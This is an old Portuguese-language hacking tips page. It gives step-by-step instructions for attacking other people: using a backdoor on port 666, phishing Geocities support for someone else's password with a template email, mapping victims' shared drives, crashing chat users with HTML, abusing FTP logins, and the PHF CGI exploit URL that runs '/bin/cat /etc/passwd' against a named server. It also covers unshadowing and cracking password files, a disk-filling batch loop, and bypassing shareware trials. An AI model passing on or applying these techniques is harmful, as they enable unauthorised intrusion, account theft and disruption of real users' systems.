Psycho Page - Hackers' Area

Área Informativa (Hacker)


 

Invasão pela porta 666


    É uma invasão fácil, mas você irá precisar do programa Aabout (www.dolphinsys.com).E a vítima também.

Procedimento:

    Primeiro você deve contactar a vítima e fazê-la executar o programa Aabout, depois entre no telnet do windows (C:\windows\telnet.exe). Vá ao menu Conectar e clique em Sistema Remoto. Vai aparecer uma tela para o login. Como host, coloque o IP dinâmico da vítima e como porta, digite 666.
Clique em conectar. No login, digite a palavra gr! (é 'gr' com o ponto de exclamação)

    Agora aparece um PROMPT, no qual você tem controle total sobre o PC da vítima. Use os comandos do DOS.

Original de Virtual Murder revisado por Blawnsteim


 

Anonymizer


Introdução:

    Qualquer Home-Page que você visita pode muito bem obter informacões sobre você, como por exemplo: Provedor, endereco IP, sistema operacional que está usando, Browser que esta usando e talvez o e-mail.
    O Anonymizer (www.anonymizer.com) age como intermediario entre o seu programa de navegação e os outros websites. Assim sendo, ele impede que o site vizitado tenha acesso a qualquer tipo de informacao sua.


Como usá-lo:
     

    Para usar o servico, você deve anteceder os URLs com o seguinte endereco do Anonymizer(http://www.anonymizer.com:8080). Se voce quiser acessar a home-page da Microsoft, por exemplo, e não quiser que ela obtenha seus dados, voce deve digitar no seu navegador http://www.anonymizer.com:8080/http://www.microsoft.com.
    Pronto desta forma voce PoDeRá até mesmo usar aquelas senhas de sites pornograficos que você tinha sem se preocupar tanto com a sua seguranca.
    ATEÇÃO: O Anonymizer não é totalmente seguro. Por isso não pense que usando o Anonymizer voce poderá sair por aí usando senhas falsas em tudo que é Site e nunca saberão quem voce é!!!


 

 

Hackeando Geocities


    Olha, é um jeito muito IDIOTA, mas em todo caso, tente. O geocities tem um pequeno bug e através dele nós vamos fazer a festa!!!

    Uma vez, criei uma página no Geocities (que deve estar abandonada até hoje). Quando eu recebi o e-mail delas indicando que eu me associei e tudo mais, eles só me falaram o meu username e o endereço que eu estava (ex: BAIRRO/NUMERO). Eles não me deram a senha. Por isso que eu acho o Geocities uma bosta.
    Vamos lá: Anote um endereço geobost..., ops..., geocities que você quer "pegar" (ex: Pentagon/3333). Anote junto o username da pessoa que está com o endereço. (ex: mike). Tente explorar os neighborhoods do geocities para achar. Tente pegar uma página recente.
    Agora entre no help do geocities e envie um e-mail anônimo (use o e-mail da pessoa) para eles explicando que você não recebeu a senha e que o seu email está com problemasl. Olha, se eles forem idiotas o bastante para cair nessa, comemore! Se você não sabe inglês, use esse texto. Substitua as partes destacadas pelo devido texto. Boa sorte!

Dear geocities,

    Until now, I haven't recieved my password and I can't work in my web site. Please re-send the passaword to me. I tried many times to use the password lookup but I didn't get my password. Also my e-mail is having some problems. Please re-send the password to seu e-mail. My name is username da pessoa . My neigborhood is endereço Bairro/numero 

Texto tirado do Virtual Murder Web Site


 

 

O básico para ser Hacker


  

Introdução:

    Várias são as fantasias e a imaginação das pessoas sobre esta figura assustadora que navega no mundo virtual. Então, vamos começar definindo primeiramente o que são estas figuras.

"Hacker":

    É aquele que tem conhecimentos profundos de sistemas operacionais e linguagens de programação, principalmente "Unix" e "C" respectivamente. Conhece as falhas de segurança dos sistemas e está sempre a procura de novas.

"Cracker":

    O mesmo que "hacker", com a diferença de utilizar seu conhecimento para o "mal". Destruir e roubar são suas palavras de ordem.

"Phreaker":

    Especializado em telefônia, atua na obtenção de ligações telefônicas gratuitas, instalação de escutas, facilitando o ataque a sistemas a partir de acesso no exterior, tornando-se invisíveis ao rastreamento ou colocando a responsabilidade em terceiros. Devido ao grande número de pessoas que hoje se dizem "hackers", novas definições poderão ser encontradas.

"Lammer":

    É quem está tentando ser "hacker", sai perguntando para todo mundo o que fazer para tornar-se um. Mas só faz merda, não tem amigos na Net, e só sabe vacilar.

"Wannabe":

    É o principiante que já aprendeu a usar os programas prontos dos verdadeiros "hackers".

"Aracker":

    O pior de todos, são os "hackers de araque". Pensam que sabem tudo e acabam acessando revistas virtuais pornográficas nas madrugadas.

"Guru":

    O "supra-sumo" (mestre) dos "hackers".

Violação de orelhões:

    Para não ser descoberto, o "hacker" estaciona o carro perto de orelhões, onde se conecta com um computador portátil para iniciar seu "trabalho".

Ponte Eletrônica:

    Computadores de instituições ou universidades menos protegidas, que o "hacker" já tenha invadido, podem servir de ponte para suas novas tentativas de invasão.

"Cavalo de Tróia" ou "Trojan Horses":

    Semelhante ao famoso presente dos troianos, onde dentro do belo cavalo de madeira, estavam escondidos centenas de soldados prontos para atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos, possuem dentro deles, códigos capazes de não só executar a função proposta, como também, destruir, armazenar, ou copiar informações do sistema. Temos como exemplo, programas que imitam "login" de um provedor e armazenam esta informação em locais onde posteriormente o "curioso" poderá recupera-la facilmente.

"Backdoors":

    São passagens secretas, ou "porta dos fundos", isto é, senha secreta criada pelo autor do "software", não documentada, é claro, que independente do administrador do sistema pode ser usada para acessar ilimitadamente todos os recursos disponíveis. "Farejamento de Redes":
Utilizando-se do empacotamento das mensagens nas redes de computadores, programas especialistas procuram neles palavras como "password" e "senha". Quando encontradas, o programa copia o pacote e o envia para o computador do "hacker", que então se utiliza de técnicas próprias para tentar decodifica-las, pois as senhas estão todas "criptografadas".

"Engenharia Social":

    Observando-se usuários de computadores digitarem suas senhas, procurando saber datas de nascimento e nome de seus filhos, por exemplo, chega-se várias vezes a descobrir suas senhas, pois em geral, as pessoas utilizam senhas que lembram algo de sua vida particular.

"Quebra Cabeça":

    Através de programas capazes de montar combinações de letras e números, os "hackers" tentam acessar os seus alvos. Esta técnica é muito demorada, pois as tentativas deverão ser efetuadas por um período curto e com grandes intervalos de tempo, para não despertar suspeita.

"Dedução":

    Muitos usuário utilizam senhas iguais ao do nome do "login" , ou seu próprio nome para "login" e sobrenome para "password". Pior ainda, alguns administradores utilizam as senhas padrões em seus sistemas, facilitando bastante a atuação dos "hackers".

"Invasão do Servidor":

    Através de "ftp" anônimo, pode-se baixar o arquivo que contem as "passwords" dos usuários e, através de técnicas de tentativa de "descriptografias", obter "passwords" deste provedor.


 

 

Hackeando IP


Introdução:

   Uma conexão PPP é essencial para se invadir por IP, além da conexão PPP é preciso o IP da pessoa que será invadida. Após disso você terá o controle de todos os drives do PC da Vítima.

Observações:

    É preciso que a Vítima tenha o compartilhamento de arquivos instalado.

Configuração:

    Veja se você tem o programa NBTSTAT.EXE - No diretório do Windows.
    É provavel que você o tenha, porque a instalação padrão do Windows o instala.
    Veja também se você está com driver Clientes para Redes Microsoft instalado no icone Redes, do Painel de Controle; se não estiver, instale-o. (Isso você deve saber, né!!!)

    O próximo passo é configurar WINS e LMHOSTS. O WINS serve para localizar computadores com IP fixo. E o LMHOSTS, computadores com IP dinâmicos (IPs dinamicos são aqueles que são atribuidos pelo Provedor, que são a maioria).
    Vá ao Painel de Controle e abra o icone Redes. Clique em TCP/IP, e em seguida no botão Propriedades. Clique em Configuração WINS e depois ative a resolução WINS.

Invasão:

    Pegue o IP da vítima na hora que você for fazer a invasão pois o IP  pode mudar sempre que ela se conectar.
    Vamos usar o IP 200.222.30.12 como exemplo.

    Digite no prompt do DOS: nbtstat -A 200.222.30.12 (o -A deve ser em   maiúsculo).
    Pode por acaso aparecer a mensagem "Host not found", isso ocorre porque o PC da vítima pode não ter compartilhamento de dados instalado ou é um IP inexistente.
    Mas se aparecer um monte de nomes doidos com "<03>" antes, aí, você deve pegar o nome do negócio que estiver com "<03>" atrás do nome.
    Rapidamente entre no arquivo LMHOSTS.SAM, do diretório do Windows usando o Notepad, e adicione à ele (abaixo dos outros IPS):

    [IP da vítima] [NetBios]

    NetBios na verdade é aquele nome doido que aparece na mesma linha do IP da vítima.
    Mas lembre-se de ser rápido porque nunca se sabe quando a vítima se desconecta.

Mapeando os Drives:

    Mapeie os drives da vítima fazerem parte de seu PC!!!

    No Windows Explorer, vá no item Ferramentas e depois Mapear unidade de Rede. Escolha uma letra de drive qualquer, e no endereço coloque: //200.222.30.12.
    Depois no Menu Iniciar, vá em Executar e digite: //200.222.30.12.


 

 

HTML em Chat


Para enviar imagens...

Comando: <img src="endereço do arquivo">

O endereço do arquivo é o local onde ele está na web, no caso você deve clicar com o botão direito do mouse na figura que você quer mandar e pedir propriedades. Ex.: Uma figura do site http://jacinto.pinto.aqui.no.rego.com/figura.jpg ai o comando ficaria
<img src="http://jacinto.pinto.aqui.no.rego.com/figura.jpg">

Para detonar o pc de alguém

Comando:
<img src="file:///a:/34646xx">
<img src="file:///a:/34646xy">
<img src="file:///a:/34646xz">
<img src="file:///d:/34646xx">
<img src="file:///d:/34646xx">
<img src="file:///e:/34646xx">
Obs: Tudo junto na mesma linha de mensagem

Como ferrar com a sala toda

Para ferrar a sala toda você deve usar o comando
<img src="qualquer foto" width="9999999999999999999999999999">
<img src="qualquer foto" width="9999999999999999999999999999">
<img src="qualquer foto" width="9999999999999999999999999999">
Obs: Tudo junto na mesma linha de mensagem

Para colocar um som na sala

<img src="http://jacinto.pinto.aqui.no.rego.com/figura.jpg"
onload="window.open('http://jacinto.pinto.aqui.no.rego.com/som.wav')"> .
Se isso não funcionar tente isso <a href="endereço do arquivo">
Clique aqui pra olvir um som </a> - Isso faz quem clikar no link ouvir o som.

Para mexer com a letra

O tamanho pode ser alterado usando o comando < font size="TAMANHO" >
O tamanho é de 1 até 7 , a cor da letra pode ser alterado usando o comando   <font color="COR"> CoR é o nome da cor em inglês exempo <font color="red">


 

 

Nuke'em


    Nuke ("NUCLEAR") é um ataque feito para travar o computador de um usuário com conexão do tipo TCP/IP (win95/NT), para isso é preciso saber apenas o IP ou o HOST deste usuário.
    O nuke trabalha em cima da porta 139 ou 135 (win/NT) de sua conexão e envia vários pacotes ICMP (mensagens de erro) fazendo com que o computador seja desconectado do servidor.
    Usando o WinNuke o usuário que for nukado poderá receber uma mensagem de erro azul! O nuke não é prejudicial ao computador, mas enche muito!
    Para praticar o NUKE basta fazer download de algum programa e saber um endereço de IP e nukar!


 

 

Hackeando FTP


    Existem varios Programas de FTP'S, se não quizer saber de ftp porra nehuma use o do DOS!!! Vá ao Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro Prompt <to>, digite o nome do host ou seu IP, tipo <to> ftp.mandic.com.br. Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, se não der, vc deve entrar INVISIVEL. Veja abaixo: 
    No login precione ENTER

    No password precione ENTER
    Irá aparecer novamente o prompt ftp> , ai é só digitar: 
    quote user ftp  <ENTER>

    quote cwd ~root <ENTER> 
    quote pass ftp  <ENTER> 

    Pronto, vc esta Hackeando...   Mas tem um porém..., se escrever a mensagem: user restriction aplly, vc não está Hackeando.., pois está aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX.... 

ATENÇÃO!!!

    Não tente Hackear usando o "user normal" de FTP'S, que é login: anonymous e password: seu E-Mail, pois vai ser aplicado a proteção.... 

MEU DEUS, EU ENTREI e AGORA o QUE FAÇO???

    Ao entrar vc vai estar no Diretorio do login, tipo \home\root\, 

    Dai, para ver a lista de users vc volta um dir vá para o dir \home\ 
e cada dir é um usuario,... não tentem pegar as senhas , pois são Cryptografadas... Pois a maioria dos users usa a mesma senha login.... 

    Ok... se vc não sabe os comandos, ai vai a dica...., se vc estiver no MS-DOS, digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai é só Hackear !!! Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e vai ser CADEIA !!!


 

 

Ataque Por Monitoria


    Os ataques por monitoração são baseados em software de monitoração de rede conhecido como "sniffer", instalado surrepticiamente pelos invasores.
    O sniffer grava os primeiros 128 bytes de cada sessão login, telnet e FTP session vista naquele segmento de rede local, comprometendo TODO o tráfego de/para qualquer máquina naquele segmento, bem como o tráfego que passar por aquele segmento. Os dados capturados incluem o nome do host destino, o username e a password. A informação é gravada num arquivo posteriormente recuperado pelo invasor para ter acesso a outras máquinas.
    Em muitos casos os invasores obtem acesso inicial aos sistemas usando uma das seguintes técnicas:

    Uma vez no sistema, os invasores obtem privilegios de root explorando vulnerabilidades conhecidas, tal como rdist, Sun Sparc integer division, e arquivos utmp passíveis de escrita por todo mundo ou usando uma password de root capturada.
Eles então instalam o software sniffer, registrando a informação capturada num arquivo invisível. Adicionalemente, eles instalam Cavalos de Troia em substituição e uma ou mais dentre os seguintes arquivos do sistema, para ocultar sua presença:

/bin/login
/usr/etc/in.telnetd
/usr/kvm/ps
/usr/ucb/netstat


 

 

Permissão Forçada - ICQ


    Se alguem já negou seu System Request, não se preocupe, o texto abaixo dá um jeito pra isso:

    1º. Crie um arquivo texto
(.txt) exatamente com o texto a seguir e salve com exensão *****.uin:

[ICQ User]

UIN=1234567654321 UIN# da Vítima

[email protected]

E-mail do cara*
NickName=Dacuh Nickname do cara*
FirstName=Ze Primeiro nome da Vítima*
LastName=Da rosca Último nome da Vítima*

*como está no cadastro da Mirabilis.

    2º. Após criar o arquivo e salvar com a extensão .uin, dê um duplo clique no arquivo criado. Você perceberá que o UIN# do cara foi adicionado a sua Lista de Contato após o duplo clique.


 

 

Ataque a provedores via Browser


 
    O ataque via browser é um dos ataques mais faceis de executar, mas não dá nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metódo:

    Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:

    Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados (se você nao sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.

 
Ex:
http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

 
    Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.


 

 

Descobrindo senhas


 

    Se você está afim de pegar senhas para o seu uso, leia atentamente as instruções abaixo:

    1. O jeito mais facil de pegar senhas, é fazendo o download do arquivo passwd, que fica no diretorio /etc do provedor. Neste arquivo, estão armazenado os logins, senhas cryptografadas e outros dados de todos os 'users' daquele provedor. Na maioria dos lugares o arquivo passwd contido no diretorio /etc, vem com um chamado shadow.

    O que seria shadow?
    Shadow, é quando o arquivo passwd nao vem com as senhas cryptografadas. Ele vem com um
* no lugar da senha. Abaixo você tem um exemplo de um passwd com shadow.
    kaneko:*:118:100:Take7:TaniKayoko:/home/students/makizono/s974076:/bin/csh

    E com esse shadow, não da pra você descryptografar as senhas. Mais existe um jeito de tirar esse shadow! Basta voce usar o programa "unshad.c". Se o arquivo passwd estiver sem shadow, não será necessário a utilizacao desse programa.

    Abaixo, um exemplo de um passwd sem shadow.

galvao:r2ln6GlgXEIVg:2201:2001:Geraldo P. Galvao:/home/galvao:/bin/csh

    No exemplo mostrado, a senha cryptografada é "r2ln6GlgXEIVg"

    2.Descryptografando as senhas

    Bom, já falamos da parte de download do passwd agora, vamos falar de como se descryptografa as senhas. Para descryptografar as senhas, você precisara de um cracker (Programa usado para descryptografar senhas)
    Ex.: CrackJack

    3.Como usar o programa unshad.c

    Usar o programa unshad.c, é muito fácil. Basta você fazer um upload dele pra sua shell, e quando ele ja estiver na shell, digite "cc -o unshad unshad.c" para compila-lo. Após a compilacao, basta digitar "./unshad" e as shells se abriram sem o shadow.

    Se você usa o Windows 95 como sistema operacional, jogue ele fora e pegue o LINUX. Se você não usar o LINUX não será um verdadeiro Hacker.


 

 

Vírus em bat


Como fazer um arquivo para encher o HD

Crie um diretorio temporario, exemplo: C:\LIXO.
Edite um arquivo do tipo X.BAT, atraves do EDIT do DOS e monte o
seguinte programa conforme as linhas abaixo.

@ECHO OFF
DIR >> ENCHE
:ENCHE
TYPE ENCHE >> ENCHE
CLS
ECHO ENCHENDO AGUARDE...
GOTO ENCHE

    Pronto, o programinha esta feito, ela ira criar cada vez um arquivo
maior com o nome enche no C:\LIXO.
    E para que usar um programinha inutil destes? Simplesmente para testar
o disco rigido, o CPU nao pode travar com o HD enchendo, nem quando ele
ficar cheio, se o CPU travar eh porque o HD esta com problema, se ele
aguentar ateh nao ter mais espaco o HD nao tem problema.
    Para cancelar a operacao, pressione CTRL+C ...
    Atencao, voce pode formatar um HD e fazer este teste, e ver se o HD
esta OK, o HD pode estar todo deletado, ou pode ser um HD usado, com
100Mb livre um de 1.2Gb ou um com 70 ou 60Mb de 1.0Gb, etc... e rodar o
programa, para testar neste HD, e quando o HD encher voce ve se esta OK
ou nao. Quando der problema, o problema pode ser do CPU ou MB as vezes.
    Depois que rodar o programa eh soh deletar o diretorio LIXO e ele
desenche o HD!
    Nunca rode isto no PROMPT do DOS do WIN 3.1 ou principalmente no
WIN 95, que o CPU ira travar. Se este for seu caso, entre antes em MODO
Somente prompt ou MODO MS-DOS.


 

 

Tornado seu shareware um freeware


    Sabe aqueles sharewares que deixam o usuario usar o programa completo por um mes e depois se auto-desinstalam do sistema?? Eles tem uma falha bem visivel que muitas pessoas jah devem ter percebido. Eles armazenam a data de instalacao em um arquivo ou setor do disco e quando completam 30 dias depois da data de instalacao, impossibilitam a sua execuçao a menos que se
registre-o. Para que esses 30 dias nao chegem tao rapido, basta modificar a data do seu computador. Para traz e' claro.

DICA: As datas de 11 em 11 anos se repetem, ou seja..

26/9/1998 - sabado.

11 anos antes: 26/9/1987 - sabado.

+11 anos atraz: 26/9/1976 - sabado.

    Ai então os dias da semana bateram com os dias do mes, e você não se atrapalhará todo, só ficara 11 anos atrasado.


 

 

Hackeando Home Pages


    Antes de mais nada é importante salientar que nos EUA existe leis contra Crime Virtual, mas no Brasil ainda não. Existe uma lei transitando no congresso a esse respeito, mas enquanto não é aprovada, não existe acusação de Crime Virtual. Mas não quer dizer que você pode invadir uma
Home Page. Porque mesmo não tendo uma acusação de Crime Virtual, você pode ser processado por perdas e danos, por exemplo. Pense muito bem antes de fazer qualquer besteira.

   Bom, agora que você já leu o aviso, vamos ao que interessa. Antes de mais nada: você já usou o IRC? Não é essencial, mas se já usou a BrasNET já deve ter percebido que quando você entra num canal registrado vazio, e o ChanServ está com lag, demora para identificar o canal como registrado. Nesse meio tempo você fica como OP, até o ChanServ identificar o canal. Tem gente que até rouba canais assim. Para invadir uma HP você parte do mesmo princípio. Você dá um ping grande no domínio em que quer entrar. Caso o ping for suficientemente grande o server cai.

    Quando ele estiver voltando você entra. Quando todos os sitemas estiverem recuperados você pode ser derrubado do domínio (espero que sem fazer nada de errado). E nem adianta que da sua casa você não pode dar um ping suficientemente grande num domínio para derrubá-lo. Também não vou dizer como você pode fazer para derrubar o domínio. Como disse desde o início, é só para você saber como fazer, não é para pôr isso em prática.

Texto traduzido por Mino e retirado da DeltaSitez .

Volta a pagina anterior